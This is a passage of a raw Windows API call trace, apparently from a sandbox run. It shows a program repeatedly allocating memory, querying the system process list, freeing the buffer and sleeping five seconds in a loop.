Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.804] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.805] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.808] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.808] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.809] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.809] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.810] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.814] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.816] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.818] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.818] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.819] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.820] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.820] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.825] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.826] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.828] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.828] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.829] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.829] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.829] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.835] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.836] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.838] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.839] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.840] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.840] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.844] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.846] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.847] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.847] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.848] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.849] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.849] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.853] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.854] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.855] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.856] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.857] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.857] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.857] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.864] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.865] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.866] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.867] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.868] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.868] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.868] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.874] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.875] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.876] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.876] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.877] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.878] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.878] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.882] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.883] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.884] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.885] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.886] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.886] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.886] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.891] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.892] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.893] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.894] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.895] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.895] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.895] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.900] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.901] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.903] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.903] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.904] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.904] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.904] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.909] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.910] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.912] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.912] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.913] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.913] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.913] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.920] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.921] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.923] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.923] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.924] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.924] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.925] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.929] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.930] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.932] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.932] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.933] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.933] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.933] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.938] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.939] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.941] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.941] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.942] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.942] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.942] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.947] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.947] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.949] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.950] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.950] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.951] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.951] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.956] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.957] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.959] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.959] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.960] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.960] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.960] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.965] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.966] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.968] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.968] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.969] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.969] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.969] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.974] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.975] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.976] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.976] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.977] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.978] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.978] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.983] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.983] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.985] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.985] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.986] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.986] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.987] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.991] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.992] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.993] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.993] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.994] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) 